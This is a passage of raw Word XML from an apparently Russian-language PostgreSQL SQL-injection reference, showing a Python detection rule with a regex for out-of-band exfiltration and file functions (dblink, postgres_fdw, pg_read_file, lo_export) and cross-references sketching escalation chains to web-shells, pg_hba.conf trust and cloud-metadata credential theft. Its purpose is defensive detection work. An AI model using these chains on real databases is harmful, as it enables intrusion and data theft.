              </w:rPr>
              <w:t>R + W</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200BDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Структурно недоступна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BF60B9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса OOB_EXFILTRATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928BE4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный regex по всем четырём подразделам 3.6 — добавить как новый класс уязвимости и одну regex-ветку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B18C318"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000161FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018DA89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64849961" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    OOB_EXFILTRATION = "oob_exfiltration"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCFD3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C4003"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0880A309" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.OOB_EXFILTRATION: 9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB5222" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AAF3A"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68712BD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"oob_exfil": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ABED43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(dblink_connect|dblink_exec|dblink|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B9FD7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+SERVER|CREATE\s+USER\s+MAPPING|CREATE\s+FOREIGN\s+TABLE|postgres_fdw|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383E1EDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"pg_read_file|pg_read_binary_file|pg_read_server_files|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4232F38E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"lo_import|lo_export|lo_get|lo_create|lo_put|lo_from_bytea|lo_unlink)\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B65E4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CE0BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22562C38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB225B"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7D91D7DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["oob_exfil"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13658B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    risk = 10 if re.search(r"\blo_export\b", sql, re.IGNORECASE) else 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B761E"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4C5F1099"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vulnerability_class=VulnerabilityClass.OOB_EXFILTRATION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760CA428" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=risk,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0285EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос использует функцию или DDL-конструкцию для "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D87E16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "out-of-band эксфильтрации, SSRF или file-операций "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0969D32F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(dblink / postgres_fdw / pg_read_file / lo_*).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD76699" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите вызов; для admin-задач — отдельная роль "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5187E215" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "и сессия, не из веб-приложения.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F92C0C"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461BC231" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поднимает risk до 10 как единственный write-вектор с RCE-потенциалом (web-shell, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trust, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5B8FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC62D3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dblink эксфильтрация: HackTricks PostgreSQL Injection (dblink-lo_import section), PDKT-Team CTF writeup (fbctf2019 hr-admin-module).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2052D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — postgres_fdw SSRF: ibreak.software «Using SQL injection to perform SSRF/XSPA attacks», PostgreSQL Docs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D79E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — pg_read_file и lo_*: PostgreSQL Docs (System Information Functions, Predefined Roles, Large Objects Implementation), Greenwolf «Authenticated arbitrary command execution on PostgreSQL» (классический разбор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для web-shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044A2B46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy (SQLi cheat sheet, PostgreSQL section), RFC 1035 §2.3.1 (charset DNS-labels для 3.6.1/3.6.2 chunked-эксфильтрации), AWS docs про IMDSv2 (для 3.6.2 cloud metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6AD12E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7A6C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обходится без них. Анонимный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN ... END $$;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-блок — одна команда для парсера, целая plpgsql-программа внутри. Атака на 3.6.2 проходит даже когда драйвер использует extended protocol (psycopg/asyncpg с параметрами, pgjdbc default), где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-stacking блокируется сервером. Поведение по 6 драйверам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F51A2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — куда уходят chain-векторы из 3.6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9DE95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.6.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web-shell → HTTP-запрос → RCE как www-data (3.7.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDCB060" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.6.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trust + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_reload_conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → новый коннект superuser-ом → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.7.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73674031" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.6.2 SSRF cloud metadata → IAM credentials → cloud-side RCE (вне scope раздела 3, упомянуто в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16989A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пути получения нужных привилегий для 3.6.2/3.6.3/3.6.4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE92F14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE ON FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наследование от admin-роли, SECURITY DEFINER функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BFD1A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT pg_read_server_files TO appuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после компрометации DBA-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DAE722" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (самая редкая) — практически только через superuser или прямой компромис backup-оператора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1D9AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468588E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Все четыре вектора в managed-PG (AWS RDS, Google Cloud SQL, Supabase) ограничены или недоступны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219F47C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.6.1, 3.6.2 — ограничены egress security-group / VPC-конфигом; preinstalled extension есть, но cloud metadata часто закрыт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C51C07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.6.3, 3.6.4 — структурно недоступны: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> зарезервированы за провайдером, не выдаются даже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
